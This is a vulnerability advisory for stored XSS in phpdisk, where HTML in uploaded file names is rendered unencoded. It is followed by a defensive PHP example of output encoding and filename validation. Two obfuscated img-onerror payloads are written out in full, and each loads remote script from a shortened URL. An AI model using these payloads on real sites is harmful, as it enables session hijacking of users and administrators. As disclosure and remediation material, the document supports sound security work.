Stored XSS at one location in phpdisk

2014-05-15T00:00:00
ID SSV:95387
Type seebug
Reporter Root
Modified 2014-05-15T00:00:00

Description

Brief description:

Hits whichever user you point it at; can also hit the admin backend.

Detailed description:

On Linux, < and > are allowed in file names. Upload a file named

&lt;img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)"&gt;

and share it with a friend, and you can hit whichever user you point it at. If you want to hit the admin backend, upload a file named

"&lt;/a&gt;&lt;img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)"&gt;

I'm being lazy and won't audit the code.
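The root cause the advisory describes is an uploaded file name being echoed into the share page's HTML without encoding, so a name containing markup is interpreted by the recipient's browser. The following is an added example, not phpdisk's own code: it shows a hypothetical file-link rendering function in its vulnerable form beside a hardened version that encodes the name for the HTML and URL contexts on output, plus an upload-time check that rejects names containing HTML metacharacters. The function names, the URL path and the sample file name are assumptions.

```php
<?php
// Added example (not phpdisk's code): vulnerable vs. hardened rendering of a shared file's name.

// Constructed sample: a file name that carries HTML, as Linux permits.
$uploadedName = '<img src="1" onerror="alert(1)">';

// VULNERABLE pattern: the raw name is concatenated straight into the page.
// Both the href attribute and the link text are injection points.
function render_link_vulnerable(string $name): string
{
    return '<a href="/download?name=' . $name . '">' . $name . '</a>';
}

// HARDENED pattern: encode for each context the value lands in.
// - rawurlencode() for the query-string value
// - htmlspecialchars() with ENT_QUOTES for the attribute and for the text node
function render_link_safe(string $name): string
{
    $href = '/download?name=' . rawurlencode($name);
    $attr = htmlspecialchars($href, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $text = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="' . $attr . '">' . $text . '</a>';
}

// Defense in depth at upload time: refuse names that contain HTML metacharacters,
// quotes, path separators or control characters. Output encoding remains mandatory;
// this check only shrinks the attack surface if some template forgets to encode.
function is_acceptable_filename(string $name): bool
{
    if ($name === '' || strlen($name) > 255) {
        return false;
    }
    return preg_match('/[<>"\'\\\\\/\x00-\x1f]/', $name) !== 1;
}

// The vulnerable form hands the <img> tag to the browser intact;
// the hardened form renders it as literal text.
echo render_link_vulnerable($uploadedName), "\n";
echo render_link_safe($uploadedName), "\n";

// The upload-time check rejects the constructed name and accepts an ordinary one.
var_dump(is_acceptable_filename($uploadedName));
var_dump(is_acceptable_filename('report-2014.pdf'));
```

Run it with the PHP CLI (php example.php) and compare the two rendered links; the difference between them is exactly the gap the advisory exploits. Encoding must happen at the point of output, once per context, rather than on the stored value, so that the same file name can be reused safely in other contexts (headers, JSON, database queries).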

Proof of vulnerability:

[Figure: 2.jpg] https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg

[Figure: 1.jpg] https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg